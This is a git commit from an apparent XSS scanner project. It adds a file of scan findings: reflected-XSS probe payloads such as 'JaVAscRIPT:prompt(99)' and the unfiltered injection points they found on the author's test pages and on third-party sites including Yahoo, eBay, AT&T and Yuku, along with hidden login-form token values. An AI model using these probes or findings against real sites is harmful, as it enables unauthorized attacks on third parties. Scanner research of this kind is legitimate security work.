lots of cleanup

This commit is contained in:
DanMcInerney
2014-07-25 06:28:24 -04:00
parent 4efed48bd2
commit 1a632cbd17
5 changed files with 911 additions and 74 deletions

2
.gitignore vendored

@@ -1,2 +1,2 @@
*.pyc
vulnerable-urls.txt
*.txt
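Review bot: The widened `*.txt` pattern still does not cover the scanner's own output, because `formatted_vulns`, added as a new 772-line file in this same commit, has no extension; that file is a dump of live findings against third-party hosts (yahoo.com, ebay.com, att.net, yuku.com and others) and carries per-page hidden `vno` form values from the yuku login forms, which should not be committed to a public repository. Add the output file to the ignore list next to the existing entries, e.g. `formatted_vulns`, and remove the committed copy from the index (`git rm --cached formatted_vulns`) so later commits do not keep refreshing it. `*.txt` is also broad enough to silently ignore any future `requirements.txt` or `README.txt`; if the intent is only to keep scan results out of the tree, a narrower pattern such as `vulnerable-urls.txt` plus the output filename is safer than a catch-all.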

772
formatted_vulns Normal file

@@ -0,0 +1,772 @@
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Type: form
Injection point: form field names: message, link, email
Line: Your unfiltered email address is: 9zqjx"()=<>9zqjx<br>
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
Line: Your filtered email address is: 9zqjxJaVAscRIPT:prompt(99)9zqjx<br>
Line: Your unfiltered email address is: 9zqjxJaVAscRIPT:prompt(99)9zqjx<br>
Line: Your message: 9zqjxJaVAscRIPT:prompt(99)9zqjx<br>
Line: Your htmlspecialchars() link: <a href=9zqjxJaVAscRIPT:prompt(99)9zqjx>Your Link</a><br>
URL: https://de.wikipedia.org/wiki/GM_Uzbekistan
Unfiltered: ">
URL: https://www.concrete5.org/community/forums/
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: sort, answerFilter, posterUser, poster, forum[], submit_search, forumSelectAll, search_keywords
Line: <input placeholder="Search Forums" type='search' name="search_keywords" value="9zqjx"()=<>9zqjx" />
URL: https://www.yahoo.com/
Unfiltered: "
Payload: '"(){}[];
Type: form
Injection point: form field names: p
Line: <html lang="en-US"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><script>(function(){var h=document.documentElement;h.className+=" js";(new Image()).src='http://l.yimg.com/p...
URL: https://www.yahoo.com/
Unfiltered: "
Payload: '&quot;(){}[];
Type: form
Injection point: form field names: p
Line: <html lang="en-US"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><script>(function(){var h=document.documentElement;h.className+=" js";(new Image()).src='http://l.yimg.com/p...
URL: https://edit.yahoo.com/registration?fs=RxTga76HafDEdyU6w.A78TIseZVOpUEtgTRXYEOrNfB29Oukm8zvXzO51tz7Lvm88D0yiE7A
Unfiltered: h()=
Payload: h()=<>
Type: url
Injection point: fs
Line: <style>#yucs{margin:0 auto;width:100% !important}#yucs .yucs-avatar{height:22px;width:22px}#yucs #yucs-profile_text .yuhead-name-greeting{display:none}#yucs #yucs-profile_text .yuhead-name{top:0;m...
URL: https://www.yahoo.com/
Unfiltered: "
Payload: '&quot;(){}[];
Type: form
Injection point: form field names: p
Line: <html lang="en-US"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><script>(function(){var h=document.documentElement;h.className+=" js";(new Image()).src='http://l.yimg.com/p...
URL: https://www.yahoo.com/
Unfiltered: "
Payload: '"(){}[];
Type: form
Injection point: form field names: p
Line: <html lang="en-US"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><script>(function(){var h=document.documentElement;h.className+=" js";(new Image()).src='http://l.yimg.com/p...
URL: http://www.ebay.com/itm/Dell-Venue-8-Pro-32GB-WiFi-Tablet-8-Display-Black-Windows-8-1-1-YEAR-WARRANTY-/141352616054
Unfiltered: h()=
Payload: h()=&lt;&gt;
Type: form
Injection point: form field names: quantity
Line: <div class="CentralArea" id="CentralArea"><div class="sd-el"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td valign="top"><div><div><div id="mainCnt" class="sd-bc"><div cla...
URL: http://www.ebay.com/itm/Dell-Venue-8-Pro-32GB-WiFi-Tablet-8-Display-Black-Windows-8-1-1-YEAR-WARRANTY-/141352616054
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: form
Injection point: form field names: quantity
Line: <div class="CentralArea" id="CentralArea"><div class="sd-el"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td valign="top"><div><div><div id="mainCnt" class="sd-bc"><div cla...
URL: http://www.ebay.com/itm/5V-2A-High-Power-AC-Adapter-Home-Wall-Charger-for-HP-TouchPad-9-7-Wi-Fi-Tablet-/301033634375
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: form
Injection point: form field names: quantity
Line: <div class="CentralArea" id="CentralArea"><div class="sd-el"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td valign="top"><div><div><div id="mainCnt" class="sd-bc"><div cla...
URL: http://www.ebay.com/gsr/i.html?_nkw=Razer+Edge+Pro&rt=nc
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: url
Injection point: rt
Line: <div class="eb:share guideShare" data-title="eBay Guides" data-tweet="" data-share="Share this guide:" data-imageUrl="http://i.ebayimg.com/00/s/ODBYODA=/z/T5AAAOxyYANTXsPr/$_106.JPG?set_id=2" data-spid="2054852" data-url="http://www.ebay.com/gsr/i.html?_nkw=Razer+Edge+Pro&rt=9zqjxh%28%29%3D9zqjx" data-style="simple" data-destinations="facebook,twitter,email,pinterest" data-language="en_US_MAIN"></div>
URL: http://www.ebay.com/gsr/i.html?_nkw=Razer+Edge+Pro&rt=nc
Unfiltered: h()=
Payload: h%28%29%3D%3C%3E
Type: url
Injection point: _nkw
Line: <title> Search results for 9zqjxh()= 9zqjx buying guides</title>
Line: <meta name="description" content="Need more information before making a buying decision? Get the answers you need from buying guides on eBay for 9zqjxh()= 9zqjx"/>
Line: <meta name="keywords" content="9zqjxh()= 9zqjx"/>
Line: <!--[if lt IE 9]> <link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/header/css/glb.ielt9?combo=90&ds=3&rvr=1.0.0&factor=AC3,GHCOLL&siteid=0&app=RAPTOR&h=100668"><![endif]--> <div c...
Line: <span class="count">0</span> guides found for <b/> 9zqjxh()= 9zqjx</div>
URL: http://www.ebay.com/sch/i.html?_nkw=+Lenovo+IdeaTab+A1000
Unfiltered: '"(){};
Payload: '"(){}[];
Type: url
Injection point: _nkw
Line: <span class="relSrc"><a class="refineSrc" href="javascript:;">Refine your search</a> for <b>9zqjx'" () {} ;9zqjx</b></span></div>
Line: <span class="nllclt"><b>0</b> results found for <b>9zqjx'" () {} ;9zqjx</b></span>
Line: <div id="followMessage" style="display:none"><p class="dContent"><span>Follow <strong>9zqjx'" () {} ;9zqjx</strong> to get e-mail alerts and updates on your eBay Feed.</span></p></div>
Line: <div id="unfollowMessage" style="display:none"><p class="dContent"><span>Unfollow <strong>9zqjx'" () {} ;9zqjx</strong> to stop getting updates on your eBay Feed.</span></p></div>
Line: <div id="followingMessage" style="display:none"><p class='dContent'>Yay! You're now following <strong>9zqjx'" () {} ;9zqjx</strong> in your <a href="http://www.ebay.com">eBay Feed</a>.<span id="email_msg"><br><br><br><a id="fs_email"><input class="fs_lnk" type="checkbox" id="fsEmail" /><label class="fs_lnk fs_lbl" for="fsEmail">Email me new items that match this interest</label></a></span></p></div>
URL: http://www.ebay.com/itm/151362874924
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: form
Injection point: form field names: maxbid
Line: <div class="CentralArea" id="CentralArea"><div class="sd-el"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td valign="top"><div><div><div id="mainCnt" class="sd-bc"><div cla...
URL: http://www.ebay.com/itm/151362868295
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: form
Injection point: form field names: maxbid
Line: <div class="CentralArea" id="CentralArea"><div class="sd-el"><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td valign="top"><div><div><div id="mainCnt" class="sd-bc"><div cla...
URL: http://www.ebay.com/gsr/i.html?_allcats=176973%7C171485%7C176974%7C162&_nkw=huawei+mediapad+10+fhd&_rg=1
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: url
Injection point: _rg
Line: <div class="eb:share guideShare" data-title="eBay Guides" data-tweet="" data-share="Share this guide:" data-imageUrl="http://i.ebayimg.com/00/s/ODBYODA=/z/T5AAAOxyYANTXsPr/$_106.JPG?set_id=2" data-spid="2054852" data-url="http://www.ebay.com/gsr/i.html?_allcats=176973|171485|176974|162&_nkw=huawei+mediapad+10+fhd&_rg=9zqjxh%28%29%3D9zqjx" data-style="simple" data-destinations="facebook,twitter,email,pinterest" data-language="en_US_MAIN"></div>
URL: http://stores.ebay.com/EarlyBirdSavings/_i.html?_fsub=4781382018
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: url
Injection point: _fsub
Line: //--></script><script type="text/javascript">window.jsRel = {type:'jgr',ver:'0',mrcowl:false}</script><link rel="alternate" type="application/rss+xml" title="eBay Store" href="http://www.ebay.com/sch/...
Line: <table width="100%" cellspacing="0" cellpadding="0"><tbody><tr><td colspan="3" rowspan="1" height="15"><img width="1" height="15" src="http://pics.ebaystatic.com/aw/pics/s.gif"...
Line: </td></tr><tr><td align="left" colspan="1" rowspan="1" valign="top" id="CentralArea"><div class="v4stabl">View: <b>All Items</b> | <a href="/earlybirdsavings/_i.html?...
Line: <div class="stBadge"><img src="http://q.ebaystatic.com/aw/pics/s.gif" width="760px" alt=" " height="1"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="stBadge...
Line: <div id="ajxThrobber_v4-0" class="ajax-throbber"><div class="ajax-mask"></div><img xrc="http://p.ebaystatic.com/aw/pics/globalAssets/imgLoading_30x30.gif"></div><div id="PreviewLayer" class="olp-mn"><...
Line: _r.put('opv4-31jsid',new vjo.darwin.comp.overlaypanel.harrow.OverlayPanelWithHArrow({"yof":12,"styles":["ov-ptr ov-pls","ov-ptr ov-pls","ov-ptr ov-prs","ov-ptr ov-prs"],"OS":{"value":2,"id":2,"name":"...
Line: _r.put('21PreviewLayer',$o17(0,false,-30,400,"21PreviewLayer","PreviewLayerjsid","PreviewLayer")); _r.put('24',new vjo.darwin.domain.finding.component.previewlayer.link.PreviewLayer({"dsOverlay":false...
URL: http://stores.ebay.com/earlybirdsavings/_i.html?_sasi=1
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: url
Injection point: _sasi
Line: //--></script><script type="text/javascript">window.jsRel = {type:'jgr',ver:'0',mrcowl:false}</script><link rel="alternate" type="application/rss+xml" title="eBay Store" href="http://www.ebay.com/sch/...
Line: <table width="100%" cellspacing="0" cellpadding="0"><tbody><tr><td colspan="3" rowspan="1" height="15"><img width="1" height="15" src="http://pics.ebaystatic.com/aw/pics/s.gif"...
Line: </td></tr><tr><td align="left" colspan="1" rowspan="1" valign="top" id="CentralArea"><div class="v4stabl">View: <b>All Items</b> | <a href="/earlybirdsavings/_i.html?...
Line: <div class="stBadge"><img src="http://q.ebaystatic.com/aw/pics/s.gif" width="760px" alt=" " height="1"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="stBadge...
Line: <div id="ajxThrobber_v4-0" class="ajax-throbber"><div class="ajax-mask"></div><img xrc="http://p.ebaystatic.com/aw/pics/globalAssets/imgLoading_30x30.gif"></div><div id="PreviewLayer" class="olp-mn"><...
Line: _r.put('opv4-31jsid',new vjo.darwin.comp.overlaypanel.harrow.OverlayPanelWithHArrow({"yof":12,"styles":["ov-ptr ov-pls","ov-ptr ov-pls","ov-ptr ov-prs","ov-ptr ov-prs"],"OS":{"value":2,"id":2,"name":"...
Line: _r.put('21PreviewLayer',$o18(0,false,-30,400,"21PreviewLayer","PreviewLayerjsid","PreviewLayer")); _r.put('24',new vjo.darwin.domain.finding.component.previewlayer.link.PreviewLayer({"dsOverlay":false...
URL: http://stores.ebay.com/earlybirdsavings/_i.html?_sasi=1
Unfiltered: h
Payload: h()=<>
Type: url
Injection point: _sasi
Line: //--></script><script type="text/javascript">window.jsRel = {type:'jgr',ver:'0',mrcowl:false}</script><link rel="alternate" type="application/rss+xml" title="eBay Store" href="http://www.ebay.com/sch/...
Line: <table width="100%" cellspacing="0" cellpadding="0"><tbody><tr><td colspan="3" rowspan="1" height="15"><img width="1" height="15" src="http://pics.ebaystatic.com/aw/pics/s.gif"...
Line: </td></tr><tr><td align="left" colspan="1" rowspan="1" valign="top" id="CentralArea"><div class="v4stabl">View: <b>All Items</b> | <a href="/earlybirdsavings/_i.html?...
Line: <div class="stBadge"><img src="http://q.ebaystatic.com/aw/pics/s.gif" width="760px" alt=" " height="1"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="stBadge...
Line: <div id="ajxThrobber_v4-0" class="ajax-throbber"><div class="ajax-mask"></div><img xrc="http://p.ebaystatic.com/aw/pics/globalAssets/imgLoading_30x30.gif"></div><div id="PreviewLayer" class="olp-mn"><...
Line: _r.put('opv4-31jsid',new vjo.darwin.comp.overlaypanel.harrow.OverlayPanelWithHArrow({"yof":12,"styles":["ov-ptr ov-pls","ov-ptr ov-pls","ov-ptr ov-prs","ov-ptr ov-prs"],"OS":{"value":2,"id":2,"name":"...
Line: _r.put('21PreviewLayer',$o12(0,false,-30,400,"21PreviewLayer","PreviewLayerjsid","PreviewLayer")); _r.put('24',new vjo.darwin.domain.finding.component.previewlayer.link.PreviewLayer({"dsOverlay":false...
URL: http://stores.ebay.com/earlybirdsavings/Motors-/_i.html?_dmd=2&_fsub=8705005018&_sid=152659078&_sop=10&_trksid=p4634.c0.m322
Unfiltered: h
Payload: h%28%29%3D%3C%3E
Type: url
Injection point: _sop
Line: //--></script><script type="text/javascript">window.jsRel = {type:'jgr',ver:'0',mrcowl:false}</script><link rel="alternate" type="application/rss+xml" title="eBay Store" href="http://www.ebay.com/sch/...
Line: <table width="100%" cellspacing="0" cellpadding="0"><tbody><tr><td colspan="3" rowspan="1" height="15"><img width="1" height="15" src="http://pics.ebaystatic.com/aw/pics/s.gif"...
Line: </td></tr><tr><td align="left" colspan="1" rowspan="1" valign="top" id="CentralArea"><div class="v4stabl">View: <b>All Items</b> | <a href="/earlybirdsavings/Motors-/...
Line: <div class="stBadge"><img src="http://q.ebaystatic.com/aw/pics/s.gif" width="760px" alt=" " height="1"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="stBadge...
Line: <div id="ajxThrobber_v4-0" class="ajax-throbber"><div class="ajax-mask"></div><img xrc="http://p.ebaystatic.com/aw/pics/globalAssets/imgLoading_30x30.gif"></div><div id="v4-13" class="olp-mn ml-pm"><t...
Line: _r.put('opv4-25jsid',new vjo.darwin.comp.overlaypanel.harrow.OverlayPanelWithHArrow({"yof":12,"styles":["ov-ptr ov-pls","ov-ptr ov-pls","ov-ptr ov-prs","ov-ptr ov-prs"],"OS":{"value":2,"id":2,"name":"...
URL: http://www.ebay.com/gsr/i.html?_nkw=+cutlery&rt=nc
Unfiltered: h()=
Payload: h()=<>
Type: url
Injection point: rt
Line: <div class="eb:share guideShare" data-title="eBay Guides" data-tweet="" data-share="Share this guide:" data-imageUrl="http://i.ebayimg.com/00/s/ODBYODA=/z/T5AAAOxyYANTXsPr/$_106.JPG?set_id=2" data-spid="2054852" data-url="http://www.ebay.com/gsr/i.html?_nkw=+cutlery&rt=9zqjxh()=9zqjx" data-style="simple" data-destinations="facebook,twitter,email,pinterest" data-language="en_US_MAIN"></div>
URL: http://www.ebay.com/gsr/i.html?_nkw=+blades&rt=nc
Unfiltered: h()=
Payload: h()=<>
Type: url
Injection point: _nkw
Line: <title> Search results for 9zqjxh()= 9zqjx buying guides</title>
Line: <meta name="description" content="Need more information before making a buying decision? Get the answers you need from buying guides on eBay for 9zqjxh()= 9zqjx"/>
Line: <meta name="keywords" content="9zqjxh()= 9zqjx"/>
Line: <!--[if lt IE 9]> <link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/header/css/glb.ielt9?combo=90&ds=3&rvr=1.0.0&factor=AC3,GHCOLL&siteid=0&app=RAPTOR&h=100668"><![endif]--> <div c...
Line: <span class="count">0</span> guides found for <b/> 9zqjxh()= 9zqjx</div>
URL: http://www.ebay.com/itm/Uncanny-X-men-503-CGC-Graded-9-8-Previews-Sketch-Edition-Fraction-Brubaker-Land-/380957411109
Unfiltered: '"(){};
Payload: '"(){}[];
Type: form
Injection point: form field names: _nkw, submit
Line: </td></tr><tr><td align="left" colspan="1" rowspan="1" valign="top" id="CentralArea"><div class="v4stabl">View: <b>All Items</b></div><div><table cellpadding="0" cell...
URL: http://www.ebay.com/sch/i.html?LH_Complete=1&LH_Sold=1&_nkw=minifig+lots&rt=nc
Unfiltered: "()=
Payload: %22%28%29%3D%3C%3E
Type: url
Injection point: _nkw
Line: <span class="relSrc"><a class="refineSrc" href="javascript:;">Refine your search</a> for <b>9zqjx" () = 9zqjx</b></span></div>
Line: <b>0</b> results found for <b>9zqjx" () = 9zqjx</b></h1>
Line: <div id="followMessage" style="display:none"><p class="dContent"><span>Follow <strong>9zqjx" () = 9zqjx</strong> to get e-mail alerts and updates on your eBay Feed.</span></p></div>
Line: <div id="unfollowMessage" style="display:none"><p class="dContent"><span>Unfollow <strong>9zqjx" () = 9zqjx</strong> to stop getting updates on your eBay Feed.</span></p></div>
Line: <div id="followingMessage" style="display:none"><p class='dContent'>Yay! You're now following <strong>9zqjx" () = 9zqjx</strong> in your <a href="http://www.ebay.com">eBay Feed</a>.<span id="email_msg"><br><br><br><a id="fs_email"><input class="fs_lnk" type="checkbox" id="fsEmail" /><label class="fs_lnk fs_lbl" for="fsEmail">Email me new items that match this interest</label></a></span></p></div>
Line: raptor.require("search.layers.FollowSearchLink").bindToLink({config:'{}', emailDefault:false, linkSelector:"e1-35", trksid: "p2045573.m2651", srchName: "9zqjx\" () = 9zqjx", saveUrl:"http://www.ebay...
URL: http://elportal.att.net/
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: memberID
Line: <meta name='DCSext.wtMemberID' content='9zqjx"()=<>9zqjx' />
URL: http://elportal.att.net/
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: memberID
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://www.att.net/products1
Unfiltered: '"(){}[];
Payload: '&quot;(){}[];
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://www.att.net/products1
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://www.att.net/webdirectory
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://www.att.net/addons
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://www.att.net/products1
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx"()=<>9zqjx' />
URL: http://www.att.net/addons
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx"()=<>9zqjx' />
URL: http://www.att.net/products1
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://elportal.att.net/
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: memberID
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://www.att.net/addons
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://www.att.net/webdirectory
Unfiltered: '"(){}[];
Payload: '"(){}[];
Type: form
Injection point: form field names: source, memberID, wtExtndSource
Line: <meta name='DCSext.wtMemberID' content='9zqjx'"(){}[];9zqjx' />
URL: http://danmcinerney.org/headers.php
Unfiltered: ()=<>
Payload: ()=<>
Type: header
Injection point: User-Agent
Line: User-Agent: 9zqjx()=<>9zqjx <br />
URL: http://danmcinerney.org/headers.php
Unfiltered: ()=<>
Payload: ()=<>
Type: header
Injection point: Referer
Line: Referer: 9zqjx()=<>9zqjx <br />
URL: http://danmcinerney.org/tests/form.html
Unfiltered: JaVAscRIPT:prompt(99)
Payload: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: message, link, email
Line: Your filtered email address is: 9zqjxJaVAscRIPT:prompt(99)9zqjx<br>
Line: Your unfiltered email address is: 9zqjxJaVAscRIPT:prompt(99)9zqjx<br>
Line: Your message: 9zqjxJaVAscRIPT:prompt(99)9zqjx<br>
Line: Your htmlspecialchars() link: <a href=9zqjxJaVAscRIPT:prompt(99)9zqjx>Your Link</a><br>
URL: http://danmcinerney.org/tests/form.html
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: message, link, email
Line: Your unfiltered email address is: 9zqjx"()=<>9zqjx<br>
URL: https://musopen.org/
Unfiltered: "
Payload: '"(){}[];
Type: form
Injection point: form field names: q
Line: <p class="correction"><span>Did you mean: <a href="?q=9zqjx+9zqjx">9zqjx 9zqjx</a></span></p>
URL: https://musopen.org/
Unfiltered: "
Payload: '&quot;(){}[];
Type: form
Injection point: form field names: q
Line: <p class="correction"><span>Did you mean: <a href="?q=9zqjx+quot+9zqjx">9zqjx quot 9zqjx</a></span></p>
URL: http://musopen.tumblr.com
Unfiltered: JaVAscRIPT:prompt(99)
Payload: JaVAscRIPT:prompt(99)
Type: form
Injection point: form field names: q
Line: <title>Musopen News | Search results for: 9zqjxJaVAscRIPT:prompt(99)9zqjx</title>
Line: <input type="text" id="txtSearch" name="q" value="9zqjxJaVAscRIPT:prompt(99)9zqjx" />
Line: <h2>Search results for <a href="9zqjxJaVAscRIPT%3Aprompt%2899%299zqjx">9zqjxJaVAscRIPT:prompt(99)9zqjx</a></h2>
Line: <p>Im sorry, but we couldn't find anything matching "<b>9zqjxJaVAscRIPT:prompt(99)9zqjx</b>". Suggestions:</p>
URL: http://oar.yuku.com/topic/15516
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: q, submit
Line: <input name="q" type="text" id="search-input" class="text" value="9zqjx"()=<>9zqjx">
Line: <h2>Search Results For: 9zqjx"()=<>9zqjx</h2>
URL: http://oar.yuku.com/reply/485104/Rockville-LP-songs-played-on-summer-tour
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <h1 class="mgr-logo-link"><a href="http://yuku.com">Yuku free message boards</a></h1><form action="" class="login-form" method="post"><div><input type="hidden" name="vno" value="r_abbf260948d17100ddce6b91405f1999"><input name="login" type="text" class="mgr-text" value="9zqjx"()=<>9zqjx"><label>Password:</label><input name="password" type="password" title="enter your password" class="mgr-text sliver-login-password">
URL: http://skindesignsalon.yuku.com/login/loginnow/Login-to-Yuku.html
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <div class="ka-field ka-text-field ka-login"><label for="ka-login_username">Username:</label><span class="ka-input-wrapper ka-text ka-hvr"><input id="ka-login_username" class="ka-text ka-hvr" type="text" name="login" value="9zqjx"()=<>9zqjx" tabindex="1"></span></div> <script type="text/javascript">
URL: http://skindesignsalon.yuku.com/portal
Unfiltered: "()=
Payload: "()=<>
Type: form
Injection point: form field names: site-url, site-name
Line: <form id="createcommunity" class="ka-create-communtiy-not-logged-in" action="http://www.yuku.com/portal/createcommunity" method="post"><div class="ka-fieldset"><div class="ka-field ka-text-field k...
URL: http://oar.yuku.com/invite/sendpage/?emaillist=&url=http%3A%2F%2Foar.yuku.com%2Ftopic%2F15522
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <h1 class="mgr-logo-link"><a href="http://yuku.com">Yuku free message boards</a></h1><form action="" class="login-form" method="post"><div><input type="hidden" name="vno" value="r_511c8191f7eac8b948195219422661de"><input name="login" type="text" class="mgr-text" value="9zqjx"()=<>9zqjx"><label>Password:</label><input name="password" type="password" title="enter your password" class="mgr-text sliver-login-password">
URL: http://oar.yuku.com/topic/15522
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: q, submit
Line: <input name="q" type="text" id="search-input" class="text" value="9zqjx"()=<>9zqjx">
Line: <h2>Search Results For: 9zqjx"()=<>9zqjx</h2>
URL: http://oar.yuku.com/topic/15516
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <h1 class="mgr-logo-link"><a href="http://yuku.com">Yuku free message boards</a></h1><form action="" class="login-form" method="post"><div><input type="hidden" name="vno" value="r_65d617984d7ee33273c98d14b7faf7a8"><input name="login" type="text" class="mgr-text" value="9zqjx"()=<>9zqjx"><label>Password:</label><input name="password" type="password" title="enter your password" class="mgr-text sliver-login-password">
URL: http://oar.yuku.com/topic/15522
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <h1 class="mgr-logo-link"><a href="http://yuku.com">Yuku free message boards</a></h1><form action="" class="login-form" method="post"><div><input type="hidden" name="vno" value="r_0082fb43c290dfbbf4793b7a0d5a59ec"><input name="login" type="text" class="mgr-text" value="9zqjx"()=<>9zqjx"><label>Password:</label><input name="password" type="password" title="enter your password" class="mgr-text sliver-login-password">
URL: http://pommielvrjen.u.yuku.com/
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <h1 class="mgr-logo-link"><a href="http://yuku.com">Yuku free message boards</a></h1><form action="" class="login-form" method="post"><div><input type="hidden" name="vno" value="r_ed0bd06c5bc0cd02e4d7896c9cf64793"><input name="login" type="text" class="mgr-text" value="9zqjx"()=<>9zqjx"><label>Password:</label><input name="password" type="password" title="enter your password" class="mgr-text sliver-login-password">
URL: http://pommielvrjen.u.yuku.com/gallery/ls
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <h1 class="mgr-logo-link"><a href="http://yuku.com">Yuku free message boards</a></h1><form action="" class="login-form" method="post"><div><input type="hidden" name="vno" value="r_1529e5f4a9fdd556c0ffa2ccb4a1f407"><input name="login" type="text" class="mgr-text" value="9zqjx"()=<>9zqjx"><label>Password:</label><input name="password" type="password" title="enter your password" class="mgr-text sliver-login-password">
URL: http://pommielvrjen.u.yuku.com/portal
Unfiltered: "()=
Payload: "()=<>
Type: form
Injection point: form field names: site-url, site-name
Line: <form id="createcommunity" class="ka-create-communtiy-not-logged-in" action="http://www.yuku.com/portal/createcommunity" method="post"><div class="ka-fieldset"><div class="ka-field ka-text-field k...
URL: http://puddinskittles.u.yuku.com/
Unfiltered: "()=<>
Payload: "()=<>
Type: form
Injection point: form field names: vno, login, password
Line: <h1 class="mgr-logo-link"><a href="http://yuku.com">Yuku free message boards</a></h1><form action="" class="login-form" method="post"><div><input type="hidden" name="vno" value="r_221cfb41bc03f1fd0aa07a3e7c565e7a"><input name="login" type="text" class="mgr-text" value="9zqjx"()=<>9zqjx"><label>Password:</label><input name="password" type="password" title="enter your password" class="mgr-text sliver-login-password">
